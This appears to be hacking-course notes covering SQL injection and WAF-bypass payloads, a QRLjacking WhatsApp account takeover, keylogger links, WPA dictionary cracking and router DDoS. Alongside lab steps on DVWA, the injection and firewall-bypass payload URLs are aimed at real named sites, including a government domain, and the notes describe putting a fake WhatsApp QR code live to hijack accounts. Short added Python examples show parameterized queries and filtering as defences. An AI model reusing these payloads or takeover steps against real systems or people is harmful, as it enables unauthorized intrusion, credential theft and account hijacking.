- Day 2
- -----
- Web Application Hacking and Security
- ------------------------------------
- Website: A collection of pages is known as a website.
- Types of Websites
- Static : A static website has no database behind it, so the user can see the content of the website but cannot input anything from the user's side.
- For Example: Pure HTML Site.
- Dynamic : These websites carry a database within, so they have many user-interaction areas where the user enters information/data, which is saved in the backend.
- For Example: Facebook, Google, Twitter, UMS, etc.
- OWASP TOP 10 Attacks
- O : Open
- W : Web
- A : Application
- S : Security
- P : Project
- www.owasp.org
- SQL Injection
- -------------
- SQL : Structured Query Language
- DDL : Data Definition Language
- DML : Data Manipulation Language
- DCL : Data Control Language
- Attack 1: Authentication Bypass Attack
- --------------------------------------
- When a hacker tries to bypass the login panel of the website and gain access to the admin panel with all its features, through which he/she can manipulate the website content.
- Target : safesecurities.com.pk
- userid=osama admin
- password=bomb admin
- select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1
- 'or'1'='1
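- Why the query above can be bypassed, and the fix, as an added example that is not part of the original notes: the login query is built by string concatenation next to the same query with bound parameters. The in-memory SQLite table, the sample password and the function names are assumptions for illustration; the table and column names follow the query in the notes.

```python
import sqlite3


def make_db():
    # Constructed sample data; plaintext password only to keep the demo short
    # (a real application stores a salted password hash).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userstable (userid TEXT, password TEXT)")
    db.execute("INSERT INTO userstable VALUES ('admin', 's3cret-constructed')")
    return db


def login_vulnerable(db, userid, password):
    # Input is pasted into the SQL text, so a quote in the input ends the
    # string literal and the rest of the input is parsed as SQL.
    query = ("SELECT * FROM userstable WHERE userid='" + userid +
             "' AND password='" + password + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, userid, password):
    # Placeholders send the input as data only; the WHERE clause keeps the
    # structure the developer wrote, whatever the input contains.
    query = "SELECT * FROM userstable WHERE userid=? AND password=?"
    return db.execute(query, (userid, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Input shape taken from the notes: a value followed by 'or'1'='1
    user, pw = "osama'or'1'='1", "bomb'or'1'='1"
    print("concatenated query logs in:", login_vulnerable(db, user, pw))
    print("parameterized query logs in:", login_parameterized(db, user, pw))
    print("real credentials still work:",
          login_parameterized(db, "admin", "s3cret-constructed"))
```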
- Union Based Injection
- ---------------------
- DVWA
- D : Damn
- V : Vulnerable
- W : Web
- A : Application
- Download : www.dvwa.org
- Requirements
- ------------
- 1. XAMPP Server (to make your computer act as a server)
- X : Cross Platform
- A : Apache
- M : MySQL
- P : PHP
- P : Perl
- Download: apachefriends.org
- 2. DVWA : Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- 3. Copy and paste the downloaded files into the C:/xampp/htdocs folder
- 127.0.0.1/dvwa
- username=admin
- password=password
- Step 1: Target
- http://192.168.235.174/dvwa/vulnerabilities/sqli/
- Step 2: Find any GET method in the URL of the website
- GET : www.gmail.com/php?id=10
- POST : www.gmail.com/id/
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 3: Check the exception handling
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
- Step 4: Total number of columns from the respective table where id is a column.
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Step 5: Dump the left 2 columns on the right hand side.
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- Step 6: Get the database and version name
- Database->Tables->Columns->Data
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- Step 7: Get all the tables of the website from the database.
- Schema: the mother of the database.
- Tables : information_schema.tables
- Columns : information_schema.columns
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Target Table Found : users
- Step 8 : Get the columns of the users table
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#
- Step 9 : Get the data from user and password columns
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#
- Bypassing Firewall aka Union Based Injection via Web Application Firewall techniques
- --------------------------------------------
- Target: multan.gov.pk
- Step 1: Find GET method in the URL
- http://target.com/files.php?id=1
- Step 2: Check the exception handling
- http://target.com/files.php?id=1'
- Step 3: Count the total number of columns
- http://target.com/files.php?id=1 order by 3--+
- Step 4: Dump the columns on the right-hand side.
- http://target.com/files.php?id=1 union select 1,2--+
- Bypassing Technique 1:
- Upper Lower Case
- union select
- UnIoN sElEcT -> new payload
- http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+
- Bypassing Technique II:Inline Comments
- --------------------------------------
- Executable inline comments
- /*!UnIoN*/ /*!SeLeCt*/
- http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- Bypassing technique 3: Version Based Inline Executable Comments
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
- MySQL
- 1.00.00 : 10000
- 2.00.00 : 20000
- 3.00.00
- 4.00.00
- 5.00.00 : 50000
- Step 5: Get the database
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+
- Step 6: Get the tables of the database
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+
- Target Table : users
- Step 7: Get the columns
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+
- Step 8: Get the login and password
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from users--+
- Secure
- -------
- 1. Do not run the WAF with default security settings.
- 2. Keep up to date on new blacklisted parameters for the WAF.
- 3. Make sure you make custom changes in the WAF according to the attacks you are getting.
- 4. Never turn off the firewall in the expectation of faster response to traffic.
- 5. Have good validation of received queries and inputs at the server level as well.
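- Items 1, 2 and 5 applied to the request shapes listed earlier in these notes (added example, not part of the original notes; the function names and the small signature list are assumptions for illustration): a literal keyword blacklist misses case changes and MySQL executable comments, a filter that normalizes the value first flags them, and server-side allow-list validation of `id` rejects all of them without needing a signature.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!...*/ and /*!50000...*/ comments as SQL,
# so a filter has to unwrap them before matching keywords.
EXEC_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SIGNATURE = re.compile(r"\bunion\b.*?\bselect\b|\binformation_schema\b")
VALID_ID = re.compile(r"[0-9]{1,9}")


def normalize(value):
    """URL-decode, unwrap executable comments, drop plain ones, fold case."""
    v = unquote_plus(value)
    prev = None
    while prev != v:                      # repeat in case of nested wrappers
        prev = v
        v = EXEC_COMMENT.sub(r" \1 ", v)
    v = PLAIN_COMMENT.sub(" ", v)
    return re.sub(r"\s+", " ", v).strip().lower()


def naive_filter(value):
    # Default-style blacklist: one exact, lowercase keyword pair.
    return "union select" in value


def normalized_filter(value):
    return SIGNATURE.search(normalize(value)) is not None


def valid_id(value):
    # Allow-list check at the server: id must be a short decimal integer.
    return VALID_ID.fullmatch(value) is not None


def triage(values):
    return [(v, naive_filter(v), normalized_filter(v), valid_id(v)) for v in values]


# Constructed sample of id values, shaped like the requests in the notes.
SAMPLES = [
    "1",
    "1 union select 1,2--+",
    "1 UnIoN sElEcT 1,2--+",
    "1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+",
    "1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+",
]

if __name__ == "__main__":
    for value, naive, norm, ok in triage(SAMPLES):
        print(f"naive={naive!s:5} normalized={norm!s:5} valid_id={ok!s:5} {value}")
```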
- WhatsApp Hacking Attack : QRLJACKING
- ------------------------------------
- Step 1: Download Kali Linux (2.99GB)
- kali.org
- How to Install and Run : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU
- Step 2: Run and fill the username and password
- username: root
- password: toor
- Step 3: Download QRLjacking code from Github
- Open Terminal: git clone https://github.com/OWASP/QRLJacking.git
- Step 4: Open QRLframework folder
- Step 5: give permissions to qrljacker.py
- chmod +x qrljacker.py
- Step 6: Run it in terminal ./QrlJacker.py
- Step 7: Select Chat Application -> WhatsApp -> Select Port 1337
- Step 8: Make this fake WhatsApp QR code live on the internet.
- Download a service AKA: ngrok
- https://ngrok.com/download
- Facebook | Email Hacking Methods
- --------------------------------
- Family Keylogger : http://www.spyarsenal.com/download.html
- How to Secure your Email Accounts
- ---------------------------------
- 1. Always use a pass phrase instead of a password.
- 2. Always use a robust password
- howsecureismypassword.net
- checkurcardhackedornot.com
- Card no Expiry Date and CVV : Check
- oncetherewasacrow
- 3. *&Ig3SimG&*
- 4. Activate 2-Step Verification in your Gmail.
- 5. Facebook: Backup codes
- 6. Always check your login activities in Gmail to see any unauthorised access.
- Reverse Engineering | Cracking LIVE
- -----------------------------------
- Reverse Engineering
- Engineering : The goal of eng. is to build something.
- High Level : ENG : C C++ Java Python
- Middle Level : Assembly : .obj
- Low Level : Binary : .exe
- Requirements
- --------------
- 1. OllyDBG
- 2. Perfect Keylogger
- 3. Windows Platform
- Target : http://www.blazingtools.com/downloads.html
- Wifi Hacking
- -------------
- Wifi Hacking: Wifi stands for wireless fidelity. It works on protocol 802.11a onwards. The goal is to provide wireless connectivity between hosts for data and information transfer and to establish a valid communication channel for the same.
- Types of KEY Security Encryptions
- ---------------------------------
- 1. WEP : 64bit
- 2. WPA : 128bit
- 3. WPA-2 PSK <--- Target 256 and above
- Problem : You cannot brute force the key.
- How to Crack then : Dictionary Based Attack
- Requirement
- -----------
- 1. Kali Linux 1.8 version (old)
- 2. airmon-ng : This CLI-based application is used to put your wifi device into monitoring mode and check whether it is capable of proceeding with the attack.
- 3. airodump-ng : This application helps you dump the air packets and identify how many wifi access points are near you, so that you can select the target to test its security.
- 4. macchanger* : This helps you spoof your wifi adapter's real identity with a fake MAC address in case you want to do anonymous security testing.
- 5. aircrack-ng : This application helps you crack the key you extracted during the wifi hacking process by matching it against the dictionary; if found, it shows the key.
- rahul -->!@#$% --> Mobile
- Router:rahul->!@#$% <---- !@#$%---rahul
- Network Attacks : Exploitation
- ------------------------------
- Active Attack : This attack is mainly concerned with attacking the device directly. Hence we get the IP of the device and then attack the IP directly; the main goal of this attack is either to gain access to that device or, if that fails, to take the host down.
- Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit wifi jammer
- *Requirement : websploit in Kali Linux
- Step 1: Open terminal and type websploit
- Step 2: To see the cli network attacks type show modules
- Source Tute: https://www.youtube.com/watch?v=I4OPAdE5yv8
- Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-wifi-jammer/